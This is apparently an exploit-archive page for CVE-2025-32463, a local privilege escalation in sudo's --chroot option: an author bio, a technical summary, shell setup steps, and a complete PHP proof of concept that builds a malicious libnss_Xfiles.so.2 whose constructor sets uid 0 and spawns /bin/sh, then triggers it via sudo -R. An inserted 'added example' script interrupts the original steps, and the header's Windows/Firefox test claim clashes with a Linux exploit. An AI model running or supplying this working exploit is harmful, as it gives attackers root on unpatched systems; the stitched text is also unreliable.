Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Sudo versions 1.9.14 through 1.9.17 contained a local privilege escalation (LPE) vulnerability. Tracked as CVE-2025-32463, the flaw resided in the `--chroot` (`-R`) option: sudo performed its name-service lookups with the user-supplied chroot directory in effect, so the NSS modules named in the chroot's `/etc/nsswitch.conf` were loaded, as root, from the attacker-controlled directory tree.

An unprivileged local user could place a crafted `nsswitch.conf` and a matching shared object (`libnss_<name>.so.2`) in a directory they control and run `sudo -R <dir> <command>`; the library's constructor then executed as root. No sudoers rule granting the user any command was required, so the bug was exploitable on a default configuration.

The vulnerability was reported by Rich Mirch of the Stratascale Cyber Research Unit. Users were advised to upgrade to sudo version 1.9.17p1 or later, which fixed the issue and deprecated the chroot option.

=============================================================================================================================================
| # Title : sudo 1.9.17 local Privilege Escalation via Sudo Chroot NSS Module Loading |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.sudo.ws/ |
=============================================================================================================================================

POC :

[+] References : https://packetstorm.news/files/id/212006/ & CVE-2025-32463


[+] Summary :

CVE-2025-32463 is a local privilege escalation vulnerability in Sudo that allows a local attacker to execute arbitrary code as root by abusing the NSS (Name Service Switch) module loading mechanism inside a user-supplied chroot.

The vulnerability exists in sudo's handling of the --chroot (-R) option. When sudo prepares to run a command under a chroot, name-service lookups are performed with the chroot in effect, so glibc reads /etc/nsswitch.conf from inside the chroot and loads the NSS modules it names from the chroot's library directories rather than from the host system. An attacker with local access can therefore build a chroot directory containing a crafted nsswitch.conf and a matching shared object whose constructor executes arbitrary code when glibc loads it.

[+] Technical Analysis :

**Vulnerability Mechanism:**

1. Attacker creates a chroot directory containing a malicious NSS configuration and a shared object
2. The nsswitch.conf inside the chroot names a service (here "Xfiles") that glibc resolves to the library file libnss_Xfiles.so.2
3. When sudo --chroot is executed, glibc loads that module from the chroot's /lib while sudo is still running as root
4. The module's constructor function executes with root privileges before any lookup is even performed

**Key Vulnerable Components:**

- Sudo's chroot implementation
- NSS module loading mechanism
- Dynamic linker behavior in chroot

[+] Attack Flow :

1. **Create Malicious Chroot Structure**

mkdir -p chtoot/{lib,etc}


2. **Write Malicious nsswitch.conf**

echo "passwd: Xfiles" > chtoot/etc/nsswitch.conf
echo "group: files" >> chtoot/etc/nsswitch.conf
echo "shadow: files" >> chtoot/etc/nsswitch.conf
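As an added example (not part of indoushka's PoC), the shell script below puts the two setup steps above into reusable functions and adds the check a defender actually wants: it parses a sudo version string of the form printed by `sudo --version` and reports whether it falls in the affected range 1.9.14 through 1.9.17 (anything before 1.9.17p1). The function names, the numeric version encoding, the lab directory layout and the version strings used for the self-check are assumptions of this example, not part of the original.

```sh
#!/bin/sh
# Added example for CVE-2025-32463 (not part of the original PoC).
# Function names and the lab directory layout are assumptions of this example.

# Convert a sudo version string ("1.9.17", "1.9.17p1", "1.9.15p5") into one
# comparable integer: ((major*100 + minor)*100 + patch)*100 + plevel.
sudo_version_number() {
    ver=$1
    base=${ver%%p*}          # strip the "pN" patch-level suffix, if any
    plevel=0
    case $ver in
        *p*) plevel=${ver##*p} ;;
    esac
    IFS=. read -r major minor patch <<EOF
$base
EOF
    echo $(( ((major * 100 + minor) * 100 + ${patch:-0}) * 100 + plevel ))
}

# Exit status 0 if the given version is affected: 1.9.14 <= v < 1.9.17p1.
# The chroot option was introduced in 1.9.14; the fix shipped in 1.9.17p1.
sudo_chroot_vulnerable() {
    n=$(sudo_version_number "$1")
    [ "$n" -ge 1091400 ] && [ "$n" -lt 1091701 ]
}

# Extract the version from the first line of `sudo --version`
# ("Sudo version 1.9.17p1 ..."). Prints nothing if sudo is not installed.
installed_sudo_version() {
    sudo --version 2>/dev/null | sed -n '1s/^Sudo version \([0-9.p]*\).*/\1/p'
}

# Name of the library glibc will look for, given a service name from
# nsswitch.conf: the service "Xfiles" becomes libnss_Xfiles.so.2.
nss_library_name() {
    printf 'libnss_%s.so.2\n' "$1"
}

# Steps 1 and 2 of the attack flow: build the chroot skeleton and the
# nsswitch.conf that maps the "passwd" database to the service "Xfiles",
# which directs the loader at <chroot>/lib/libnss_Xfiles.so.2.
build_lab_chroot() {
    root=$1
    mkdir -p "$root/lib" "$root/etc"
    printf 'passwd: Xfiles\ngroup: files\nshadow: files\n' > "$root/etc/nsswitch.conf"
}

# Stand-alone use: report whether the installed sudo (if any) is affected.
if v=$(installed_sudo_version) && [ -n "$v" ]; then
    if sudo_chroot_vulnerable "$v"; then
        echo "sudo $v: affected by CVE-2025-32463, upgrade to 1.9.17p1 or later"
    else
        echo "sudo $v: not in the affected range (1.9.14 to 1.9.17)"
    fi
else
    echo "sudo not found in PATH"
fi
```

The version check treats every patch level of 1.9.14, 1.9.15 and 1.9.16 as affected and only 1.9.17p1 and later as fixed; distributions that backport the fix without bumping the version string will be reported as affected, so confirm against the distribution's changelog in that case.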


[+] Usage: php poc.php

[+] POC :

<?php
/**
 * PoC for CVE-2025-32463: Local privilege escalation via sudo --chroot
 * PHP version of the Python exploit
 *
 * Use in lab environments only. Do not run on production systems.
 */

class SudoChrootExploit {
    private $chroot = "./chtoot";
    private $libDir;
    private $etcDir;
    private $payloadC = "payload.c";
    private $libName = "libnss_Xfiles.so.2";   // glibc looks for libnss_<service>.so.2
    private $payloadSo;
    private $nsswitch;
    private $verbose = false;

    public function __construct($verbose = false) {
        $this->verbose = $verbose;
        $this->libDir = $this->chroot . "/lib";
        $this->etcDir = $this->chroot . "/etc";
        $this->payloadSo = $this->libDir . "/" . $this->libName;
        $this->nsswitch = $this->etcDir . "/nsswitch.conf";
    }

    private function log($msg) {
        if ($this->verbose) {
            echo "[*] " . $msg . PHP_EOL;
        }
    }

    // Step 1: create <chroot>/lib and <chroot>/etc
    private function setupChroot() {
        echo "[+] Setting up chroot directories..." . PHP_EOL;

        if (!is_dir($this->libDir)) {
            mkdir($this->libDir, 0755, true);
            $this->log("Created directory: " . $this->libDir);
        }

        if (!is_dir($this->etcDir)) {
            mkdir($this->etcDir, 0755, true);
            $this->log("Created directory: " . $this->etcDir);
        }

        $this->log("Chroot structure created successfully");
    }

    // Step 2: point the passwd database at the "Xfiles" service
    private function writeNsswitch() {
        echo "[+] Writing fake nsswitch.conf..." . PHP_EOL;

        $nsswitchContent = "passwd: Xfiles\n" .
                           "group: files\n" .
                           "shadow: files\n";

        if (file_put_contents($this->nsswitch, $nsswitchContent) === false) {
            throw new Exception("Failed to write nsswitch.conf");
        }

        $this->log("Written malicious nsswitch.conf to " . $this->nsswitch);
    }

    // Step 3: the NSS module source; the constructor runs when glibc loads it
    private function writePayload() {
        echo "[+] Writing payload source..." . PHP_EOL;

        $payloadCode = '
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <nss.h>
#include <pwd.h>

__attribute__((constructor)) void init() {
    unsetenv("LD_PRELOAD");
    setuid(0);
    setgid(0);
    system("/bin/sh");
}

enum nss_status _nss_Xfiles_getpwnam_r(const char *name, struct passwd *pwd,
                                       char *buf, size_t buflen, int *errnop) {
    return NSS_STATUS_NOTFOUND;
}
';

        if (file_put_contents($this->payloadC, $payloadCode) === false) {
            throw new Exception("Failed to write payload source");
        }

        $this->log("Written C payload to " . $this->payloadC);
    }

    // Step 4: build the shared object into <chroot>/lib/libnss_Xfiles.so.2
    private function compilePayload() {
        echo "[+] Compiling malicious libnss module..." . PHP_EOL;

        $compileCmd = "gcc -fPIC -shared -o " .
                      escapeshellarg($this->payloadSo) . " " .
                      escapeshellarg($this->payloadC) . " -nostartfiles";

        $this->log("Compilation command: " . $compileCmd);

        $output = [];
        $returnCode = 0;
        exec($compileCmd . " 2>&1", $output, $returnCode);

        if ($returnCode !== 0) {
            throw new Exception("Compilation failed: " . implode("\n", $output));
        }

        if (!file_exists($this->payloadSo)) {
            throw new Exception("Compiled library not found: " . $this->payloadSo);
        }

        $this->log("Successfully compiled shared object to " . $this->payloadSo);
    }

    private function cleanup() {
        echo "[+] Cleaning up payload source..." . PHP_EOL;

        if (file_exists($this->payloadC)) {
            if (unlink($this->payloadC)) {
                $this->log("Removed " . $this->payloadC);
            } else {
                echo "[!] Warning: Failed to remove " . $this->payloadC . PHP_EOL;
            }
        }
    }

    // Step 5: sudo -R <chroot> triggers the NSS lookup inside the chroot
    private function runExploit() {
        echo "[+] Launching sudo with chroot to trigger exploit..." . PHP_EOL;

        $sudoCmd = "sudo -R " . escapeshellarg($this->chroot) . " id";
        $this->log("Executing: " . $sudoCmd);

        // Method 1: Using system()
        echo "[*] Attempting exploit via system()..." . PHP_EOL;
        system($sudoCmd, $returnCode);

        if ($returnCode !== 0) {
            // Method 2: Using exec with output
            echo "[*] Attempting exploit via exec()..." . PHP_EOL;
            $output = [];
            exec($sudoCmd, $output, $returnCode);

            if (!empty($output)) {
                echo "[*] Command output:" . PHP_EOL;
                foreach ($output as $line) {
                    echo "    " . $line . PHP_EOL;
                }
            }

            if ($returnCode !== 0) {
                echo "[!] Exploit may have failed. Return code: " . $returnCode . PHP_EOL;
                echo "[!] Check if sudo allows chroot and if gcc is installed" . PHP_EOL;
            }
        }
    }

    private function checkDependencies() {
        echo "[+] Checking dependencies..." . PHP_EOL;

        $dependencies = [
            'sudo' => 'sudo --version',
            'gcc'  => 'gcc --version',
        ];

        foreach ($dependencies as $name => $cmd) {
            $output = [];
            $returnCode = 0;
            exec($cmd . " 2>/dev/null", $output, $returnCode);

            if ($returnCode === 0) {
                $this->log("$name is available");
            } else {
                throw new Exception("$name is not available or not in PATH");
            }
        }

        $this->log("All dependencies satisfied");
    }

    private function showInfo() {
        echo "=== CVE-2025-32463 Exploit Information ===" . PHP_EOL;
        echo "Vulnerability: Local privilege escalation via sudo --chroot" . PHP_EOL;
        echo "Mechanism: Malicious NSS module loading in chroot environment" . PHP_EOL;
        echo "Target: sudo versions with chroot capability" . PHP_EOL;
        echo "Effect: Potential root shell execution" . PHP_EOL;
        echo "==========================================" . PHP_EOL . PHP_EOL;
    }

    public function run() {
        try {
            $this->showInfo();
            $this->checkDependencies();
            $this->setupChroot();
            $this->writeNsswitch();
            $this->writePayload();
            $this->compilePayload();
            $this->cleanup();
            $this->runExploit();

            echo PHP_EOL . "[+] Exploit sequence completed." . PHP_EOL;

        } catch (Exception $e) {
            echo "[!] Error: " . $e->getMessage() . PHP_EOL;
            echo "[!] Exploit failed." . PHP_EOL;
            exit(1);
        }
    }

    public function __destruct() {
        // Additional cleanup if needed
        if (file_exists($this->payloadC)) {
            unlink($this->payloadC);
        }
    }
}

// Command line argument parsing
function parseArgs() {
    $options = getopt("v", ["verbose", "help"]);

    if (isset($options['help'])) {
        echo "Usage: php " . basename(__FILE__) . " [OPTIONS]" . PHP_EOL . PHP_EOL;
        echo "Options:" . PHP_EOL;
        echo "  -v, --verbose    Enable verbose output for debugging" . PHP_EOL;
        echo "  --help           Show this help message" . PHP_EOL . PHP_EOL;
        echo "Description:" . PHP_EOL;
        echo "  Proof-of-Concept for CVE-2025-32463: Local privilege escalation" . PHP_EOL;
        echo "  via sudo --chroot using malicious NSS modules." . PHP_EOL . PHP_EOL;
        echo "Warning:" . PHP_EOL;
        echo "  Use in lab environments only. Do not run on production systems." . PHP_EOL;
        exit(0);
    }

    return [
        'verbose' => isset($options['v']) || isset($options['verbose'])
    ];
}

// Main execution
if (php_sapi_name() === 'cli') {
    $args = parseArgs();
    $exploit = new SudoChrootExploit($args['verbose']);
    $exploit->run();
} else {
    echo "This script must be run from the command line." . PHP_EOL;
    exit(1);
}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
